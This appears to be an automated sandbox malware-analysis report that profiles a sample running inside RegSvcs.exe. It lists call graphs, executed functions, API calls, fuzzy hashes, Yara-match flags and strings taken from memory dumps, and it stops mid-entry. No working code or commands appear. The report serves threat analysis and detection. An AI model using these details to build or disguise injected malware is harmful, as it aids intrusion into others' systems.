90368->90396 90371 41b1cc 90374 41b1d7 90371->90374 90375 42c7c3 NtClose 90371->90375 90372 41b1e4 90373 41b200 90372->90373 90376 42c7c3 NtClose 90372->90376 90373->90358 90374->90358 90375->90374 90377 41b1f6 90376->90377 90377->90358 90379 4283a5 90378->90379 90381 4283b2 90379->90381 90407 4186d3 90379->90407 90381->90362 90383 42cb9d 90382->90383 90384 42cbae ExitProcess 90383->90384 90384->90359 90386 41651d 90385->90386 90388 416536 90386->90388 90389 42d213 90386->90389 90388->90366 90391 42d22d 90389->90391 90390 42d25c 90390->90388 90391->90390 90392 42be03 LdrInitializeThunk 90391->90392 90393 42d2bc 90392->90393 90394 42e893 RtlFreeHeap 90393->90394 90395 42d2d5 90394->90395 90395->90388 90397 41b07d 90396->90397 90401 41b159 90396->90401 90402 42bea3 90397->90402 90400 42c7c3 NtClose 90400->90401 90401->90371 90401->90372 90403 42bebd 90402->90403 90406 15d35c0 LdrInitializeThunk 90403->90406 90404 41b14d 90404->90400 90406->90404 90408 4186fd 90407->90408 90414 418bfb 90408->90414 90415 413d03 90408->90415 90410 41882a 90411 42e893 RtlFreeHeap 90410->90411 90410->90414 90412 418842 90411->90412 90413 42cb83 ExitProcess 90412->90413 90412->90414 90413->90414 90414->90381 90419 413d23 90415->90419 90417 413d8c 90417->90410 90418 413d82 90418->90410 90419->90417 90420 41b483 RtlFreeHeap LdrInitializeThunk 90419->90420 90420->90418 90442 418e18 90443 42c7c3 NtClose 90442->90443 90444 418e22 90443->90444 90445 15d2b60 LdrInitializeThunk

                                                              Executed Functions

                                                              Function 00417853 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 371 417853-41787c call 42f473 374 417882-417890 call 42fa73 371->374 375 41787e-417881 371->375 378 4178a0-4178b1 call 42df13 374->378 379 417892-41789d call 42fd13 374->379 384 4178b3-4178c7 LdrLoadDll 378->384 385 4178ca-4178cd 378->385 379->378 384->385
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178C5
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 76b506a0cc5b578974a65303308517cdf43573eca2b8ac17c4e7b5baa97a7e0c
                                                              • Instruction ID: 1cb38ccdf7d651f1bb70c04efbc39f1e1caf3780722470d7d920a02544f09f31
                                                              • Opcode Fuzzy Hash: 76b506a0cc5b578974a65303308517cdf43573eca2b8ac17c4e7b5baa97a7e0c
                                                              • Instruction Fuzzy Hash: 110152B1E4020DB7DF10EAE1DC42FDEB7789B14308F4041A6E90897240F634EB48C795
                                                              Function 0042C7C3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 396 42c7c3-42c7fc call 404653 call 42da03 NtClose
                                                              APIs
                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C7F7
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 4b864a366b5b27e43805e6b99a6c495b5a065df10857e84a8a109e2f0984c103
                                                              • Instruction ID: 655702566d971be8828d1eb074539a96951f6316c6bda2febc2cf9207e520fe9
                                                              • Opcode Fuzzy Hash: 4b864a366b5b27e43805e6b99a6c495b5a065df10857e84a8a109e2f0984c103
                                                              • Instruction Fuzzy Hash: B3E046362042547BC220BA5AEC41FDB776DEBC5754F00441AFA08A7241D6B6BA158BE8
                                                              Function 015D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 410 15d2b60-15d2b6c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6c9103fabb4391724a00c641fa909b1130fd69d6f926c90f84624d33a38f5f73
                                                              • Instruction ID: 7c122859cda5735cfa88d52c7e3190221f5b65acb0d2046d145294b44a1b9722
                                                              • Opcode Fuzzy Hash: 6c9103fabb4391724a00c641fa909b1130fd69d6f926c90f84624d33a38f5f73
                                                              • Instruction Fuzzy Hash: DF90026160240003410972584418616408AA7E0211B59C421E1014990DC56589916225
                                                              Function 015D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 220d5999afe8c2ff18fcbec11b728cf811283856e94346799e0008f8f8c898f4
                                                              • Instruction ID: 77ac7b294673f5818fa2640514454856cf971841be5eca3eeeee6d53ff32a42e
                                                              • Opcode Fuzzy Hash: 220d5999afe8c2ff18fcbec11b728cf811283856e94346799e0008f8f8c898f4
                                                              • Instruction Fuzzy Hash: 2990023160140413D115725845087070089A7D0251F99C812A0424958DD6968A52A221
                                                              Function 015D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 64284f91fc8fdcf540f350768119264298cedf07dd77707d9663ceb2cea0c902
                                                              • Instruction ID: 3e29ed3d29b0892d6e8d646bbcd5991538b16a9bd0b63507ac230cab250efbfd
                                                              • Opcode Fuzzy Hash: 64284f91fc8fdcf540f350768119264298cedf07dd77707d9663ceb2cea0c902
                                                              • Instruction Fuzzy Hash: B190023160148802D1147258840874A0085A7D0311F5DC811A4424A58DC6D589917221
                                                              Function 015D35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 00c02998ad449e1fb0cdfaf22ac89aabc67d5067995c22b333551498058e2c6e
                                                              • Instruction ID: 4adf2cd3ea3bdca79dca36a60b1f974098add921ac85357bd232ca71505b5a38
                                                              • Opcode Fuzzy Hash: 00c02998ad449e1fb0cdfaf22ac89aabc67d5067995c22b333551498058e2c6e
                                                              • Instruction Fuzzy Hash: 5D900231A0550402D104725845187061085A7D0211F69C811A0424968DC7D58A5166A2
                                                              Function 0041404F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: H846yjBj$H846yjBj
                                                              • API String ID: 1836367815-1638195495
                                                              • Opcode ID: ef7a9ffdf6561eef383bbc0664de7790ce42323556bf1a7fe240d511c29f7c54
                                                              • Instruction ID: 3c683207899974e191189142c536af44746b7e051b83f101aac545a713f4ebdb
                                                              • Opcode Fuzzy Hash: ef7a9ffdf6561eef383bbc0664de7790ce42323556bf1a7fe240d511c29f7c54
                                                              • Instruction Fuzzy Hash: D7018C71A0524C7FE7129EA0AC82CEFFBACDE82754B0481DEF61097251C6355E428791
                                                              Function 00414086 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 10 414086-4140d0 call 42e933 call 42f343 call 417853 18 4140d7-4140fd call 424f43 10->18 19 4140d2 call 4045c3 10->19 22 41411d-414123 18->22 23 4140ff-41410e PostThreadMessageW 18->23 19->18 23->22 24 414110-41411a 23->24 24->22
                                                              APIs
                                                              • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: H846yjBj$H846yjBj
                                                              • API String ID: 1836367815-1638195495
                                                              • Opcode ID: 1e575f985c92c78392c5d7947edd5ded7c5b5c375e9d7c50ded5dd71fbab49a2
                                                              • Instruction ID: 7b3e0f07fc7c6ddc1f756203e9316b04f6aa799e2925db75b152c8468b4ea2e0
                                                              • Opcode Fuzzy Hash: 1e575f985c92c78392c5d7947edd5ded7c5b5c375e9d7c50ded5dd71fbab49a2
                                                              • Instruction Fuzzy Hash: 9F114CB1E0011C7EDB01EBE19C82DEFBB7CDF81798F40806AFA04A7141D6785E068BA1
                                                              Function 00414093 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 25 414093-4140d0 call 42e933 call 42f343 call 417853 33 4140d7-4140fd call 424f43 25->33 34 4140d2 call 4045c3 25->34 37 41411d-414123 33->37 38 4140ff-41410e PostThreadMessageW 33->38 34->33 38->37 39 414110-41411a 38->39 39->37
                                                              APIs
                                                              • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: H846yjBj$H846yjBj
                                                              • API String ID: 1836367815-1638195495
                                                              • Opcode ID: 984f09a5dd09cd233dbe0f3a3a71350ed3a96ed15f6ad2f6789276278f6a4a35
                                                              • Instruction ID: 01bac9bffc664040b2840fdb37e185e6924918b58f593d4067fc296cad9bf454
                                                              • Opcode Fuzzy Hash: 984f09a5dd09cd233dbe0f3a3a71350ed3a96ed15f6ad2f6789276278f6a4a35
                                                              • Instruction Fuzzy Hash: 5B01D6B1D0011C7AEB11ABE19C82DEFBB7CDF81798F40806AFA14B7141D6785E464BB5
                                                              Function 00414124 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 40 414124 call 42e933 call 42f343 call 417853 48 4140d7-4140fd call 424f43 40->48 49 4140d2 call 4045c3 40->49 52 41411d-414123 48->52 53 4140ff-41410e PostThreadMessageW 48->53 49->48 53->52 54 414110-41411a 53->54 54->52
                                                              APIs
                                                              • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: H846yjBj$H846yjBj
                                                              • API String ID: 1836367815-1638195495
                                                              • Opcode ID: d81ff8332ae71bd7ece2f7822f94f5d0f07d4ea2383a445a210605cec379552c
                                                              • Instruction ID: a53e75af234e0e2e8dc2ff362a0ab489f932a6b22d02496a9ffdf3fd85ddbe1d
                                                              • Opcode Fuzzy Hash: d81ff8332ae71bd7ece2f7822f94f5d0f07d4ea2383a445a210605cec379552c
                                                              • Instruction Fuzzy Hash: 1101F2B2D0011C7ADB11AAE19C82DEFBB7CDF81798F41806AFA04B7101D63C4E464BA5
                                                              Function 0042CAE3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 386 42cae3-42cb27 call 404653 call 42da03 RtlAllocateHeap
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,0041E634,?,?,00000000,?,0041E634,?,?,?), ref: 0042CB22
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: ab17b47021c6a0295688baa9bc7f5b74f4096b25377d82b86614dd7a19cdddd4
                                                              • Instruction ID: 02f8b4c6de11923e5652d0b1f4fbb4dcd003679feaa33a1029ac6aba649ea141
                                                              • Opcode Fuzzy Hash: ab17b47021c6a0295688baa9bc7f5b74f4096b25377d82b86614dd7a19cdddd4
                                                              • Instruction Fuzzy Hash: BDE09271604254BBC610EE99DC42FDB73ADEFC9714F004419FE08A7281D771B92187B8
                                                              Function 0042CB33 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 391 42cb33-42cb74 call 404653 call 42da03 RtlFreeHeap
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5B5E5FE1,00000007,00000000,00000004,00000000,004170BD,000000F4), ref: 0042CB6F
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: 74b9442f213fd3182763185ae7e99eac7d520918a63298e6a42031909f51ab9e
                                                              • Instruction ID: 88be9b9c6e7c59d6deab935c3c2594d1acbce9d117d58b86ffaeade349e087e0
                                                              • Opcode Fuzzy Hash: 74b9442f213fd3182763185ae7e99eac7d520918a63298e6a42031909f51ab9e
                                                              • Instruction Fuzzy Hash: 58E06D712043047BE610EE99EC41FDB33ADEFC5710F004419FA18A7282DA75B9108AB8
                                                              Function 0042CB83 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 401 42cb83-42cbbc call 404653 call 42da03 ExitProcess
                                                              APIs
                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,20989162,?,?,20989162), ref: 0042CBB7
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_RegSvcs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: bc082ca53517514892f10464e003e6611e059de3d739efd828c9c0662ba77a05
                                                              • Instruction ID: 4425423616075f17903b9c30fbfbf6d552649cbcaebd69dcc1db9d7e0672c02a
                                                              • Opcode Fuzzy Hash: bc082ca53517514892f10464e003e6611e059de3d739efd828c9c0662ba77a05
                                                              • Instruction Fuzzy Hash: 9CE086356042157BD210FA5ADC01FAF775CDFC5755F00842AFA08A7282D775790087F4
                                                              Function 015D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 406 15d2c0a-15d2c0f 407 15d2c1f-15d2c26 LdrInitializeThunk 406->407 408 15d2c11-15d2c18 406->408
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 1949cef9742fc98c6a8476f2eb4c5e89e3a55229c98486c4f0ad34eba3bdb5e8
                                                              • Instruction ID: dd5498e994d33f10a70b297bf6bc3704806a627ca2b025b84a5387940168edff
                                                              • Opcode Fuzzy Hash: 1949cef9742fc98c6a8476f2eb4c5e89e3a55229c98486c4f0ad34eba3bdb5e8
                                                              • Instruction Fuzzy Hash: 0EB09B71D025C5D5DA16E764460C71B794077D0711F19C461D2030A42F4778C5D1E375

                                                              Non-executed Functions

                                                              Function 01612349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              • Opcode ID: 753cf0473531ffbebf807b5f258825d112e43e3b1894a6fa2dab422dd1fe2bca
                                                              • Instruction ID: 06b2a617b03c5080b7b7583baf575935f9110f62788112b56b5754a1c5cf9f25
                                                              • Opcode Fuzzy Hash: 753cf0473531ffbebf807b5f258825d112e43e3b1894a6fa2dab422dd1fe2bca
                                                              • Instruction Fuzzy Hash: 10929A71604342AFE721CE28CC90B6BB7E9BB84714F28492DFA95DB354D770E844CB92
                                                              Function 015C8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016054CE
                                                              • undeleted critical section in freed memory, xrefs: 0160542B
                                                              • 8, xrefs: 016052E3
                                                              • corrupted critical section, xrefs: 016054C2
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0160540A, 01605496, 01605519
                                                              • Thread identifier, xrefs: 0160553A
                                                              • Invalid debug info address of this critical section, xrefs: 016054B6
                                                              • Critical section debug info address, xrefs: 0160541F, 0160552E
                                                              • Address of the debug info found in the active list., xrefs: 016054AE, 016054FA
                                                              • double initialized or corrupted critical section, xrefs: 01605508
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016054E2
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01605543
                                                              • Critical section address, xrefs: 01605425, 016054BC, 01605534
                                                              • Critical section address., xrefs: 01605502
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                              • API String ID: 0-2368682639
                                                              • Opcode ID: 3b70742a387fda5c4bbd6a03b38d6d0336959543e73da586f49a154c12b9a070
                                                              • Instruction ID: 75fe547f71fddd1670b9ba8b3e9d4e6b13011bda2b096ad9f998424988c7758b
                                                              • Opcode Fuzzy Hash: 3b70742a387fda5c4bbd6a03b38d6d0336959543e73da586f49a154c12b9a070
                                                              • Instruction Fuzzy Hash: 02817AB1A41349AFEB25CF99CC45BAEBBB5FB48B14F104119E505BB280D3B1A941CBA0
                                                              Function 015C29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01602506
                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016024C0
                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016025EB
                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01602409
                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01602624
                                                              • @, xrefs: 0160259B
                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016022E4
                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01602498
                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0160261F
                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01602412
                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01602602
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                              • API String ID: 0-4009184096
                                                              • Opcode ID: 1b653e6362ea8df0b8668b534cf8f50968fe2b4b0fe7d3294d6cc8fb0e9b2b4a
                                                              • Instruction ID: 3176527dc945a18ccef7d677beeacc02393115b914cb7bf5f62102f57b02aab3
                                                              • Opcode Fuzzy Hash: 1b653e6362ea8df0b8668b534cf8f50968fe2b4b0fe7d3294d6cc8fb0e9b2b4a
                                                              • Instruction Fuzzy Hash: DB025EB1D002299FDB25DF54CC94BDAB7B8BF54704F0441EEA609AB281EB709E84CF59
                                                              Function 01638B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                              • API String ID: 0-2515994595
                                                              • Opcode ID: 051d0a5bfa22310cde095405b79f5a7b1fd9be0fe005d23fdda80f0b0717538c
                                                              • Instruction ID: c4d36d7c45579d865188b1984fcbfec690d3b9ce9e715fc415b40681771995d4
                                                              • Opcode Fuzzy Hash: 051d0a5bfa22310cde095405b79f5a7b1fd9be0fe005d23fdda80f0b0717538c
                                                              • Instruction Fuzzy Hash: D3519B725143029BD329CF288C48BABBBECFFD8654F144A1DB99987241E770DA05CBD2
                                                              Function 01640274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 0-1700792311
                                                              • Opcode ID: 2858f580c102991b266aff57c73279242d6be801eb10ec390c75c9ba6ca1f4eb
                                                              • Instruction ID: 51857c86373650716a5f2e9ce594073e2f0d8e756a59441848fc7a6e06378613
                                                              • Opcode Fuzzy Hash: 2858f580c102991b266aff57c73279242d6be801eb10ec390c75c9ba6ca1f4eb
                                                              • Instruction Fuzzy Hash: FED1CE316006A6EFDB26EF68C840AEDBBF6FF49610F088149F646AB752C734D941CB54
                                                              Function 016189B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01618A67
                                                              • AVRF: -*- final list of providers -*- , xrefs: 01618B8F
                                                              • VerifierFlags, xrefs: 01618C50
                                                              • VerifierDlls, xrefs: 01618CBD
                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01618A3D
                                                              • VerifierDebug, xrefs: 01618CA5
                                                              • HandleTraces, xrefs: 01618C8F
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                              • API String ID: 0-3223716464
                                                              • Opcode ID: 284fdea9e0a23e4e394eb215a8aa40acfc5bdcf057511ae3d29375025a0b2d46
                                                              • Instruction ID: e9dccd21a847dc7a377d57cd14286cbec616c7189ea0cb285213ae8d03255a22
                                                              • Opcode Fuzzy Hash: 284fdea9e0a23e4e394eb215a8aa40acfc5bdcf057511ae3d29375025a0b2d46
